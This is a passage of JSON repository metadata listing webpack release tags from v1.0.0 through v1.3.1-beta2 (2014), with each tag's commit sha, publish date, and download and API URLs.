_at":"2014-06-18T09:12:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta2/manifests"},{"name":"v1.3.1-beta1","sha":"8c2327e0b7863853a45ef094dbb8ded520e0314f","kind":"commit","published_at":"2014-06-17T20:46:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta1/manifests"},{"name":"v1.3.0-beta9","sha":"419eb4dfd9d7ed8ad16688874e33bbe57617e2d8","kind":"commit","published_at":"2014-06-17T20:40:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta9/manifests"},{"name":"v1.3.0-beta8","sha":"d3db09f72066ee23ec241f33ad6dfb00d42e8582","kind":"commit","published_at":"2014-06-12T04:31:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta8/manifests"},{"name":"v1.3.0-beta7","sha":"46a918f5682ec766bc21424311f16fe28bcd8892","kind":"commit","published_at":"2014-06-11T20:52:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta7/manifests"},{"name":"v1.3.0-beta6","sha":"20ad2baf9afd6a8d4e969e9ee094994c7b11905b","kind":"commit","published_at":"2014-06-11T20:26:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta6/manifests"},{"name":"v1.3.0-beta5","sha":"8bfb752c526ef612b2011c7bc266b7adb7a8fcb7","kind":"commit","published_at":"2014-06-05T17:54:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta5/manifests"},{"name":"v1.3.0-beta4","sha":"56e7073abbfec4b920bf1dffb0924027072d0c4e","kind":"commit","published_at":"2014-06-05T07:31:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta4/manifests"},{"name":"v1.3.0-beta3","sha":"5cfd4138d682139af7069342aa66e0495070db9b","kind":"commit","published_at":"2014-06-04T06:48:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta3/manifests"},{"name":"v1.3.0-beta2","sha":"560762a932475e21e68577ba33f9482d738f1edc","kind":"commit","published_at":"2014-06-03T06:45:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta2/manifests"},{"name":"v1.3.0-beta1","sha":"ebac371b7228a04fab834260208d157c5333df0f","kind":"commit","published_at":"2014-06-02T22:19:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta1/manifests"},{"name":"v1.2.0-beta6","sha":"fc6d418e3d5bd0bc6356e82850173c33c52a567a","kind":"commit","published_at":"2014-05-27T09:54:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.2.0-beta6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.2.0-beta6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.2.0-beta6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta6/manifests"},{"name":"v1.2.0-beta5","sha":"2b6bfde9d5d634e47558c6f6b8589622a1fb6062","kind":"commit","published_at":"2014-05-26T21:54:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.2.0-beta5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.2.0-beta5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.2.0-beta5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta5/manifests"},{"name":"v1.2.0-beta4","sha":"4ead6596a9a96dcde6f827ce1dce77c36701f113","kind":"commit","published_at":"2014-05-26T10:48:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.2.0-beta4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.2.0-beta4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.2.0-beta4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta4/manifests"},{"name":"v1.2.0-beta3","sha":"36803b52719fa8f07d21c5fbab90f26a8b1f2bed","kind":"commit","published_at":"2014-05-22T10:17:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.2.0-beta3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.2.0-beta3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.2.0-beta3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta3/manifests"},{"name":"v1.2.0-beta2","sha":"8ddfa0a950520306bb8694071d168a0d2a7a18a2","kind":"commit","published_at":"2014-05-21T16:34:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.2.0-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.2.0-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.2.0-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta2/manifests"},{"name":"v1.2.0-beta1","sha":"943a17c027279833e03a1b62fa60417cf4a5a5ac","kind":"commit","published_at":"2014-05-21T05:49:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.2.0-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.2.0-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.2.0-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta1/manifests"},{"name":"v1.1.11","sha":"2898f870eaeefcf0b60885743df8da9362883d63","kind":"commit","published_at":"2014-05-16T23:00:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.11","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.11/manifests"},{"name":"v1.1.10","sha":"7824ed8e29961197f3d74a755820f7b31fa01b5b","kind":"commit","published_at":"2014-05-08T16:44:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.10/manifests"},{"name":"v1.1.9","sha":"613e6a0bd0b4ca24791d01b3131b98533e33ff3a","kind":"commit","published_at":"2014-05-08T07:35:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.9/manifests"},{"name":"v1.1.8","sha":"adf3108a785630cd46daff093a80eb78f507a3a5","kind":"commit","published_at":"2014-04-19T19:36:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.8/manifests"},{"name":"v1.1.7","sha":"0ed9c759926ac0f7ec9be10643522657c6b4af53","kind":"commit","published_at":"2014-04-17T07:56:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.7/manifests"},{"name":"v1.1.6","sha":"504cb48e8fbd298fc6fa89f4fce99f30f8c072d1","kind":"commit","published_at":"2014-04-17T06:42:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.6/manifests"},{"name":"v1.1.5","sha":"32df8b73092c4fb59965f14ff833dfe70ba4940e","kind":"commit","published_at":"2014-04-09T07:12:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.5/manifests"},{"name":"v1.1.4","sha":"d6aa7b1388a3fe4b1a3b146a4986bb2b5ea99d03","kind":"commit","published_at":"2014-04-05T16:11:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.4/manifests"},{"name":"v1.1.3","sha":"5dcf54c1d4885d50625d799625c14123fd412fe1","kind":"commit","published_at":"2014-04-03T17:47:14.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.3/manifests"},{"name":"v1.1.2","sha":"fece5aee86748f0f230176aa25d9a7334e91be3d","kind":"commit","published_at":"2014-03-31T09:33:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.2/manifests"},{"name":"v1.1.1","sha":"67cae9333cd53eb29efd32944961172313d9e49a","kind":"commit","published_at":"2014-03-31T06:50:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.1/manifests"},{"name":"v1.1.0","sha":"5154409d669d871540b8052c1173244cdc1a1aa1","kind":"commit","published_at":"2014-03-25T09:31:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0/manifests"},{"name":"v1.1.0-beta12","sha":"256baf487179c7dee8254e716cd7f9d0db84842f","kind":"commit","published_at":"2014-03-21T15:22:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta12","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta12/manifests"},{"name":"v1.1.0-beta11","sha":"8af61319cbe22cb17a406180d94faab54b39a7f6","kind":"commit","published_at":"2014-03-20T07:38:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta11","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta11/manifests"},{"name":"v1.1.0-beta10","sha":"b1d5ed3dd6f84ee29070795d2b269a2a03a57c57","kind":"commit","published_at":"2014-03-19T21:16:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta10/manifests"},{"name":"v1.1.0-beta9","sha":"410c1f5bf82e66b9faaa7dbe2d9b58538c86b0e7","kind":"commit","published_at":"2014-03-18T21:45:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta9/manifests"},{"name":"v1.1.0-beta8","sha":"48ace947f915a9388b87119d43afb4e5580c2ed8","kind":"commit","published_at":"2014-03-12T22:03:23.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta8/manifests"},{"name":"v1.1.0-beta7","sha":"06056a40bee6fc843d15b854f6b0c7bacc381ac6","kind":"commit","published_at":"2014-03-12T21:30:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta7/manifests"},{"name":"v1.1.0-beta6","sha":"5ab7bf35ae2ad2ba1defe4cee4c5ab46679f1534","kind":"commit","published_at":"2014-03-11T17:43:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta6/manifests"},{"name":"v1.1.0-beta5","sha":"00c11cb7c27dfb416e36cf21200bad0c86cea34c","kind":"commit","published_at":"2014-03-11T15:08:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta5/manifests"},{"name":"v1.1.0-beta4","sha":"8ec37911f52b476f57e75480e642c7932dc43112","kind":"commit","published_at":"2014-03-10T13:00:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta4/manifests"},{"name":"v1.1.0-beta3","sha":"4a47a7add67c38faec552ae0e06da7632758c022","kind":"commit","published_at":"2014-03-07T16:08:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta3/manifests"},{"name":"v1.1.0-beta2","sha":"65ac850ab7b425a5c2264bd60a91fdf9b1e891ea","kind":"commit","published_at":"2014-03-05T19:10:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta2/manifests"},{"name":"v1.1.0-beta1","sha":"b27540e27bc34809110b180a19a3e56537aeb8df","kind":"commit","published_at":"2014-03-03T14:21:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta1/manifests"},{"name":"v1.0.5","sha":"09afa4749babcfc8dd4aa2866b385c27cf00ce59","kind":"commit","published_at":"2014-03-01T19:07:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.5/manifests"},{"name":"v1.0.4","sha":"b88938ceea7f2017723f2baf21d604ce726b2c4a","kind":"commit","published_at":"2014-03-01T12:37:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.4/manifests"},{"name":"v1.0.3","sha":"f172af367494f70acdb194adca1624df9bee05c5","kind":"commit","published_at":"2014-02-27T08:20:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.3/manifests"},{"name":"v1.0.1","sha":"c5f3bdec73c8efcf0179fe966230c652e8111557","kind":"commit","published_at":"2014-02-24T14:07:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.1/manifests"},{"name":"v1.0.0","sha":"5530e3784dbad2952ce210a7ad4fa5e87b7c14c2","kind":"commit","published_at":"2014-02-19T22:09:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0","html_url":"https://github.com/webpack/webpack/releases/tag/